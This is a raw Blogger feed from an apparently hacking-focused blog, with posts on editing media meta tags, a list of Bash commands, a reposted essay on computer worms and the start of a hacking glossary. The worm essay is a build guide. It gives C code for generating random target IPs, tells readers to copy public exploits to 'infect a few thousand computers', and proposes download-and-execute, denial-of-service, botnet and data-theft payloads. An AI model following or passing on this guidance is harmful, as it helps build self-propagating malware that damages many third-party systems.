&lt;b&gt;Tools&amp;gt;&amp;gt;Media Information&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-csXHBO0t4YU/T2bfgUL7JII/AAAAAAAAAEs/MjpIi4q8uTg/s1600/meta-tag1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;216&quot; src=&quot;http://1.bp.blogspot.com/-csXHBO0t4YU/T2bfgUL7JII/AAAAAAAAAEs/MjpIi4q8uTg/s320/meta-tag1.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;2)&lt;/b&gt; Thats it.!!Now you can edit all the meta tags and save them.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-ppCb1uxIyHQ/T2bfq-PKcpI/AAAAAAAAAE0/qNZp-gn8zDU/s1600/meta-tag2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;222&quot; src=&quot;http://1.bp.blogspot.com/-ppCb1uxIyHQ/T2bfq-PKcpI/AAAAAAAAAE0/qNZp-gn8zDU/s320/meta-tag2.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Alternative Method:-&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;There are many tools available out all over the internet, I found a tool named Mp3 Tag Editor which is Good to Edit MP3 file&#39;s meta tag. Download It &lt;a href=&quot;http://www.2shared.com/file/_Zr2cbuq/mp3Tag_Editor.html&quot;&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;But VLC Media Player can edit almost every Audio and video file&#39;s Meta Tags.&lt;br /&gt;&lt;br /&gt;Enjoy..!!!&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/7857241668792285298/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-edit-meta-tags-of-media-files.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/7857241668792285298'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/7857241668792285298'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-edit-meta-tags-of-media-files.html' title='How to edit meta tags of Media files using VLC Player'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-csXHBO0t4YU/T2bfgUL7JII/AAAAAAAAAEs/MjpIi4q8uTg/s72-c/meta-tag1.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-3931875975566504055</id><published>2012-03-18T12:30:00.000+05:30</published><updated>2012-03-18T12:30:05.113+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basics"/><category scheme="http://www.blogger.com/atom/ns#" term="Linux"/><title type='text'>Some Basic Bash Commands</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-BFD888lHvqA/T2RDPeUbLSI/AAAAAAAAAEk/CYxXymjYKgw/s1600/linux-logo.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://2.bp.blogspot.com/-BFD888lHvqA/T2RDPeUbLSI/AAAAAAAAAEk/CYxXymjYKgw/s320/linux-logo.jpg&quot; width=&quot;271&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;List of Some Basic BASH Commands:-&lt;br /&gt;&lt;br /&gt;I&#39;d like to point out to everyone before reading that this list is very far from completion and does not include all of the extendable possibilities. When I say this, nmap isn&#39;t a built-in command until you install nmap. These commands just stand for those that come with a Linux/UNIX BASH installation.&lt;br /&gt;&lt;br /&gt;A&lt;br /&gt;&lt;br /&gt;adduser Add a user to the system&lt;br /&gt;addgroup Add a group to the system&lt;br /&gt;alias Create an alias •&lt;br /&gt;apropos Search Help manual pages (man -k)&lt;br /&gt;apt-get Search for and install software packages (Debian)&lt;br /&gt;aspell Spell Checker&lt;br /&gt;awk Find and Replace text, database sort/validate/index&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;B&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;basename Strip directory and suffix from filenames&lt;br /&gt;bash GNU Bourne-Again SHell&lt;br /&gt;bc Arbitrary precision calculator language&lt;br /&gt;bg Send to background&lt;br /&gt;break Exit from a loop •&lt;br /&gt;builtin Run a shell builtin&lt;br /&gt;bzip2 Compress or decompress named file(s)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;C&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;cal Display a calendar&lt;br /&gt;case Conditionally perform a command&lt;br /&gt;cat Display the contents of a file&lt;br /&gt;cd Change Directory&lt;br /&gt;cfdisk Partition table manipulator for Linux&lt;br /&gt;chgrp Change group ownership&lt;br /&gt;chmod Change access permissions&lt;br /&gt;chown Change file owner and group&lt;br /&gt;chroot Run a command with a different root directory&lt;br /&gt;chkconfig System services (runlevel)&lt;br /&gt;cksum Print CRC checksum and byte counts&lt;br /&gt;clear Clear terminal screen&lt;br /&gt;cmp Compare two files&lt;br /&gt;comm Compare two sorted files line by line&lt;br /&gt;command Run a command - ignoring shell functions •&lt;br /&gt;continue Resume the next iteration of a loop •&lt;br /&gt;cp Copy one or more files to another location&lt;br /&gt;cron Daemon to execute scheduled commands&lt;br /&gt;crontab Schedule a command to run at a later time&lt;br /&gt;csplit Split a file into context-determined pieces&lt;br /&gt;cut Divide a file into several parts&lt;br /&gt;D&lt;br /&gt;date Display or change the date &amp;amp; time&lt;br /&gt;dc Desk Calculator&lt;br /&gt;dd Convert and copy a file, write disk headers, boot records&lt;br /&gt;ddrescue Data recovery tool&lt;br /&gt;declare Declare variables and give them attributes •&lt;br /&gt;df Display free disk space&lt;br /&gt;diff Display the differences between two files&lt;br /&gt;diff3 Show differences among three files&lt;br /&gt;dig DNS lookup&lt;br /&gt;dir Briefly list directory contents&lt;br /&gt;dircolors Colour setup for `ls&#39;&lt;br /&gt;dirname Convert a full pathname to just a path&lt;br /&gt;dirs Display list of remembered directories&lt;br /&gt;dmesg Print kernel &amp;amp; driver messages&lt;br /&gt;du Estimate file space usage&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;E&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;echo Display message on screen •&lt;br /&gt;egrep Search file(s) for lines that match an extended expression&lt;br /&gt;eject Eject removable media&lt;br /&gt;enable Enable and disable builtin shell commands •&lt;br /&gt;env Environment variables&lt;br /&gt;ethtool Ethernet card settings&lt;br /&gt;eval Evaluate several commands/arguments&lt;br /&gt;exec Execute a command&lt;br /&gt;exit Exit the shell&lt;br /&gt;expect Automate arbitrary applications accessed over a terminal&lt;br /&gt;expand Convert tabs to spaces&lt;br /&gt;export Set an environment variable&lt;br /&gt;expr Evaluate expressions&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;F&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;false Do nothing, unsuccessfully&lt;br /&gt;fdformat Low-level format a floppy disk&lt;br /&gt;fdisk Partition table manipulator for Linux&lt;br /&gt;fg Send job to foreground&lt;br /&gt;fgrep Search file(s) for lines that match a fixed string&lt;br /&gt;file Determine file type&lt;br /&gt;find Search for files that meet a desired criteria&lt;br /&gt;fmt Reformat paragraph text&lt;br /&gt;fold Wrap text to fit a specified width.&lt;br /&gt;for Expand words, and execute commands&lt;br /&gt;format Format disks or tapes&lt;br /&gt;free Display memory usage&lt;br /&gt;fsck File system consistency check and repair&lt;br /&gt;ftp File Transfer Protocol&lt;br /&gt;function Define Function Macros&lt;br /&gt;fuser Identify/kill the process that is accessing a file&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;G&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;gawk Find and Replace text within file(s)&lt;br /&gt;getopts Parse positional parameters&lt;br /&gt;grep Search file(s) for lines that match a given pattern&lt;br /&gt;groups Print group names a user is in&lt;br /&gt;gzip Compress or decompress named file(s)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;H&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hash Remember the full pathname of a name argument&lt;br /&gt;head Output the first part of file(s)&lt;br /&gt;help Display help for a built-in command •&lt;br /&gt;history Command History&lt;br /&gt;hostname Print or set system name&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;id Print user and group id&#39;s&lt;br /&gt;if Conditionally perform a command&lt;br /&gt;ifconfig Configure a network interface&lt;br /&gt;ifdown Stop a network interface&lt;br /&gt;ifup Start a network interface up&lt;br /&gt;import Capture an X server screen and save the image to file&lt;br /&gt;install Copy files and set attributes&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;J&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;join Join lines on a common field&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;K&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;kill Stop a process from running&lt;br /&gt;killall Kill processes by name&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;L&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;less Display output one screen at a time&lt;br /&gt;let Perform arithmetic on shell variables •&lt;br /&gt;ln Make links between files&lt;br /&gt;local Create variables •&lt;br /&gt;locate Find files&lt;br /&gt;logname Print current login name&lt;br /&gt;logout Exit a login shell •&lt;br /&gt;look Display lines beginning with a given string&lt;br /&gt;lpc Line printer control program&lt;br /&gt;lpr Off line print&lt;br /&gt;lprint Print a file&lt;br /&gt;lprintd Abort a print job&lt;br /&gt;lprintq List the print queue&lt;br /&gt;lprm Remove jobs from the print queue&lt;br /&gt;ls List information about file(s)&lt;br /&gt;lsof List open files&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;M&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;make Recompile a group of programs&lt;br /&gt;man Help manual&lt;br /&gt;mkdir Create new folder(s)&lt;br /&gt;mkfifo Make FIFOs (named pipes)&lt;br /&gt;mkisofs Create an hybrid ISO9660/JOLIET/HFS filesystem&lt;br /&gt;mknod Make block or character special files&lt;br /&gt;more Display output one screen at a time&lt;br /&gt;mount Mount a file system&lt;br /&gt;mtools Manipulate MS-DOS files&lt;br /&gt;mv Move or rename files or directories&lt;br /&gt;mmv Mass Move and rename (files)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;N&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;netstat Networking information&lt;br /&gt;nice Set the priority of a command or job&lt;br /&gt;nl Number lines and write files&lt;br /&gt;nohup Run a command immune to hangups&lt;br /&gt;nslookup Query Internet name servers interactively&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;O&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;open Open a file in its default application&lt;br /&gt;op Operator access&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;P&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;passwd Modify a user password&lt;br /&gt;paste Merge lines of files&lt;br /&gt;pathchk Check file name portability&lt;br /&gt;ping Test a network connection&lt;br /&gt;pkill Stop processes from running&lt;br /&gt;popd Restore the previous value of the current directory&lt;br /&gt;pr Prepare files for printing&lt;br /&gt;printcap Printer capability database&lt;br /&gt;printenv Print environment variables&lt;br /&gt;printf Format and print data •&lt;br /&gt;ps Process status&lt;br /&gt;pushd Save and then change the current directory&lt;br /&gt;pwd Print Working Directory&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Q&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;quota Display disk usage and limits&lt;br /&gt;quotacheck Scan a file system for disk usage&lt;br /&gt;quotactl Set disk quotas&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;R&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ram ram disk device&lt;br /&gt;rcp Copy files between two machines&lt;br /&gt;read Read a line from standard input •&lt;br /&gt;readarray Read from stdin into an array variable •&lt;br /&gt;readonly Mark variables/functions as readonly&lt;br /&gt;reboot Reboot the system&lt;br /&gt;rename Rename files&lt;br /&gt;renice Alter priority of running processes&lt;br /&gt;remsync Synchronize remote files via email&lt;br /&gt;return Exit a shell function&lt;br /&gt;rev Reverse lines of a file&lt;br /&gt;rm Remove files&lt;br /&gt;rmdir Remove folder(s)&lt;br /&gt;rsync Remote file copy (Synchronize file trees)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;S&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;screen Multiplex terminal, run remote shells via ssh&lt;br /&gt;scp Secure copy (remote file copy)&lt;br /&gt;sdiff Merge two files interactively&lt;br /&gt;sed Stream Editor&lt;br /&gt;select Accept keyboard input&lt;br /&gt;seq Print numeric sequences&lt;br /&gt;set Manipulate shell variables and functions&lt;br /&gt;sftp Secure File Transfer Program&lt;br /&gt;shift Shift positional parameters&lt;br /&gt;shopt Shell Options&lt;br /&gt;shutdown Shutdown or restart linux&lt;br /&gt;sleep Delay for a specified time&lt;br /&gt;slocate Find files&lt;br /&gt;sort Sort text files&lt;br /&gt;source Run commands from a file `.&#39;&lt;br /&gt;split Split a file into fixed-size pieces&lt;br /&gt;ssh Secure Shell client (remote login program)&lt;br /&gt;strace Trace system calls and signals&lt;br /&gt;su Substitute user identity&lt;br /&gt;sudo Execute a command as another user&lt;br /&gt;sum Print a checksum for a file&lt;br /&gt;symlink Make a new name for a file&lt;br /&gt;sync Synchronize data on disk with memory&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;T&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;tail Output the last part of files&lt;br /&gt;tar Tape ARchiver&lt;br /&gt;tee Redirect output to multiple files&lt;br /&gt;test Evaluate a conditional expression&lt;br /&gt;time Measure Program running time&lt;br /&gt;times User and system times&lt;br /&gt;touch Change file timestamps&lt;br /&gt;top List processes running on the system&lt;br /&gt;traceroute Trace Route to Host&lt;br /&gt;trap Run a command when a signal is set(bourne)&lt;br /&gt;tr Translate, squeeze, and/or delete characters&lt;br /&gt;true Do nothing, successfully&lt;br /&gt;tsort Topological sort&lt;br /&gt;tty Print filename of terminal on stdin&lt;br /&gt;type Describe a command •&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;U&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ulimit Limit user resources •&lt;br /&gt;umask Users file creation mask&lt;br /&gt;umount Unmount a device&lt;br /&gt;unalias Remove an alias •&lt;br /&gt;uname Print system information&lt;br /&gt;unexpand Convert spaces to tabs&lt;br /&gt;uniq Uniquify files&lt;br /&gt;units Convert units from one scale to another&lt;br /&gt;unset Remove variable or function names&lt;br /&gt;unshar Unpack shell archive scripts&lt;br /&gt;until Execute commands (until error)&lt;br /&gt;useradd Create new user account&lt;br /&gt;usermod Modify user account&lt;br /&gt;users List users currently logged in&lt;br /&gt;uuencode Encode a binary file&lt;br /&gt;uudecode Decode a file created by uuencode&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;V&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;v Verbosely list directory contents (`ls -l -b&#39;)&lt;br /&gt;vdir Verbosely list directory contents (`ls -l -b&#39;)&lt;br /&gt;vi Text Editor&lt;br /&gt;vmstat Report virtual memory statistics&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;W&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;watch Execute/display a program periodically&lt;br /&gt;wc Print byte, word, and line counts&lt;br /&gt;whereis Search the user&#39;s $path, man pages and source files for a program&lt;br /&gt;which Search the user&#39;s $path for a program file&lt;br /&gt;while Execute commands&lt;br /&gt;who Print all usernames currently logged in&lt;br /&gt;whoami Print the current user id and name (`id -un&#39;)&lt;br /&gt;Wget Retrieve web pages or files via HTTP, HTTPS or FTP&lt;br /&gt;write Send a message to another user&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;X&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;xargs Execute utility, passing constructed argument list(s)&lt;br /&gt;yes Print a string until interrupted&lt;br /&gt;. Run a command script in the current shell&lt;br /&gt;### Comment / Remark&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Furthermore, if you would like to learn more of these commands simply type the command prepended with the &quot;man&quot; command. So if you would like to learn more of the &quot;echo&quot; command you would type &quot;man echo&quot;. This will then display any documentation and/or manuals for the command. Whilst it is not necessarily to replace the --help parameter, it can be useful for learning more of how the command works.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/3931875975566504055/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/some-basic-bash-commands.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/3931875975566504055'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/3931875975566504055'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/some-basic-bash-commands.html' title='Some Basic Bash Commands'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-BFD888lHvqA/T2RDPeUbLSI/AAAAAAAAAEk/CYxXymjYKgw/s72-c/linux-logo.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-5281723344968556910</id><published>2012-03-17T14:00:00.000+05:30</published><updated>2012-03-17T14:00:02.257+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basics"/><category scheme="http://www.blogger.com/atom/ns#" term="virus"/><title type='text'>Misconceptions About Computer Worms</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://www.techfume.com/wp-content/uploads/2011/04/virus-computer.jpg&quot; /&gt;&lt;/div&gt;&lt;br /&gt;Misconceptions About Computer Worms And An Insight Into There Creation&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Intro&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;There are a few misconceptions that some members have about Internet Worms and their behavior.all too often i hear people saying &quot;Oh it looks like you have been infected by some kind of worm&quot; and almost 99% of the time they are completely wrong. So here goes my attempt to clear up a few things on worms.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Definition&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;A computer worm is a self-replicating Malware computer program. It uses a computer network to send copies of itself to other nodes (computers on the network) and it may do so without any user intervention. This is due to security shortcomings on the target computer.&lt;br /&gt;&lt;br /&gt;REF:en.wikipedia.org/wiki/Computer_worm&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Ok So How?&lt;/b&gt;&lt;br /&gt;Common and notorious worms have been pieces of code that use a (mostly 0 day) exploit in a widely used services like IIS or Apache. The advantage of using 0 day exploit is that no-one is patched for it and the longer the delay in the patch the more devastating the worm is.&lt;br /&gt;&lt;br /&gt;Internet worms flourish by using the full bandwidth of the victim to scan for more victims to copy its self to, so the more hosts that get infected the more scanning packets hit the internet thus creating a pyramid effect.&lt;br /&gt;&lt;br /&gt;The common worm model is a piece of code that when it infects a victim spawns numerous threads (Code Red II used 100), in the case of Code Red II the worm used 99 threads to scan for more victims and one thread as a payload that defaced the web server it was running on and/or attempts to cause Denial of Service Conditions on the white house website.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Study - Slammer Worm&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;The slammer worm is a perfect example of how successful worms spread INCREDIBLY FAST, the Slammer worm infected 90% of vulnerable targets (targets vulnerable to the MS SQL buffer overflow) within TEN MINUTES of its launch at 05:30 UTC on January 25, 2003. The shear speed of the attack cause the entire internet to slow down, in some cases parts of the internet buckled under the bandwidth usage so much that businesses and home users internet got completely disconnected.&lt;br /&gt;&lt;br /&gt;A contributing factor to the speed at which the Slammer worm spread is its use of a single UDP packet to exploit victims. The worm itself was a mere 376 bytes which fit perfectly inside a UDP packet allowing Slammer to simple fire thousands of requests per second using the full bandwidth of the node it had infected.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Propagation - And a look at the rabbit hole&lt;/span&gt;&lt;br /&gt;But one thing i have found when researching is that NOT ONE book on the market describes how the worm copies itself from an already infected node to a newly exploited node. So im going to use the fact i have got your attention to put a few ideas i have collected together on how worms copy them selves:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1) A &#39;Sudo Worm&#39; &lt;/b&gt;- This is my name for a worm thats exploit payload downloads itself from a fixed remote server. Thus not propagating entirely by itself (hence the sudo) - However, there is one major disadvantage to this technique, if the worm becomes a problem, the CERT organization have the ability to shut down the one server where the worm copy is located (found by reversing the worm code), thus immobilizing the propagation of every infected node. - I know the smart hackers on here are thinking of a way round this through polymorphic code but eventually the worm still needs to be centralized.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;2) Socket sharing &lt;/b&gt;- this is the most obfuscated topic in worm creation (so please appreciate that im about to be very vague because this was one whole in my research), the payload of the exploit spawns a socket which then listens for the other infected node to send a binary copy of itself straight from memory to the remote node. This is a fast idea but would only work if the two OS&#39;s are identical, thus the code has to get alot larger to accommodate multiple OS/architecture versions of itself (so forget about that one UDP packet )&lt;br /&gt;&lt;br /&gt;&lt;b&gt;3) Quines&lt;/b&gt; - Quines in my opinion are the most interesting peices of code there is - a quine by definition is a program who&#39;s ultimate out put is a copy code itself. (Ill pause to let you think about that) So a worms exploit payload would be a working copy of the worm itself, that would then scan for more victims and run the same exploit, to cause the same payload copy of itself to launch on the victim (and on and on and on). (If your interested in learning about quines and how to code and are willing to follow an adf.ly link to help me out then here you go - QUINES )&lt;br /&gt;&lt;br /&gt;Worm Creation - THE TRUTH&lt;br /&gt;&lt;br /&gt;In all honesty it is very easy to code an internet worm if you have a grasp of the theory and some coding skill,it requires the following elements of code:&lt;br /&gt;&lt;br /&gt;An Ip generator - To create a random ip address to search for new victims.&lt;br /&gt;&lt;br /&gt;Here is a vague c ip generator function i made to give you an idea of where to start.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;void octgen(){&lt;br /&gt;&amp;nbsp; int oct[3];&lt;br /&gt;&amp;nbsp; int i;&lt;br /&gt;&amp;nbsp; srand ( time(NULL) );&lt;br /&gt;&amp;nbsp; for(i=0;i&amp;lt;4;i++){oct[i]= rand() % 220 + 1;}&lt;br /&gt;&amp;nbsp; if (oct[0] != 127 ){&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;printf(&quot;%i.%i.%i.%i&quot;,oct[0],oct[1],oct[2],oct[3]);&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;}else{&lt;br /&gt;&amp;nbsp; &amp;nbsp; octgen();&lt;br /&gt;&amp;nbsp; &amp;nbsp; }&lt;/blockquote&gt;}&lt;br /&gt;&lt;br /&gt;&lt;b&gt;An Exploit&lt;/b&gt;&lt;br /&gt;To rival the success of slammer and code red would require a new 0 day exploit and some fast expert programming to get the worm out before the patch, but for a small worm you could easily rip an exploit of http://inj3ct0r.com/ and still infect a few thousand computers.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;An Exploit Payload + Propagation Technique&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;A propagation technique is the hardest thing in creating worms because the whole subject is obfuscated in books and on the internet to stop everyone making worms, so youll need to either make due with a download and exe payload for your worm and be happy with a sudo worm, or code your own payload for your exploit and find a slightly cleverer way to propagate. For Help with payload programming and finding 0 day exploits i suggest you read (yes kids its a book) The Shellcoders Handbook&lt;br /&gt;&lt;br /&gt;&lt;b&gt;A Worm Payload&lt;/b&gt;&lt;br /&gt;Now this is where it gets interesting and is up to the coder to be honest, personally you could be happy knowing your worm is on thousands of computers silently doing now damage, however potentially you could have a date triggered payload so that every infected node stops propagating and denial of services a high profile site or strings all nodes into a huge botnet. Some of the more devastating (and clever) worms have stolen international secrets, stolen funds and destroyed thousands of pounds worth of data. But ill leave this up to you.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Conclusion&lt;/b&gt;&lt;br /&gt;For those of you that have read this far i hope you have enjoy my little insight into the world of computer worms and have enjoyed a small glimpse into how worms are created in the real world. And now i wont be the only person on HF with my fingers crossed when a new high profile 0 day hits the headlines, and im sat there just waiting for the next worm to ravage the internet.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Happy Hacking. :)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Thanks to sol@ris for this!!!&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;I&#39;m just a&amp;nbsp;Distributor not the author of this post.&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/5281723344968556910/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/misconceptions-about-computer-worms.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/5281723344968556910'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/5281723344968556910'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/misconceptions-about-computer-worms.html' title='Misconceptions About Computer Worms'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-2000542023662724226</id><published>2012-03-17T13:30:00.000+05:30</published><updated>2012-03-16T13:33:37.698+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basics"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type='text'>Some Common Terms in Hacking Explained</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-IGo4NczX70c/T2LzgniTNUI/AAAAAAAAAEc/0r65krGEdHI/s1600/Hacker.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://3.bp.blogspot.com/-IGo4NczX70c/T2LzgniTNUI/AAAAAAAAAEc/0r65krGEdHI/s320/Hacker.gif&quot; width=&quot;283&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Q: What is hacking?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;A: The terms &quot;hack&quot; are also used to refer to a modification of a program or device to give the user access to features that were otherwise unavailable, such as DIY circuit bending. It is from this usage that the term &quot;hacking&quot; is often incorrectly used to refer to more nefarious criminal uses such as identity theft, credit card fraud or other actions categorized as computer crime&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Q: What is 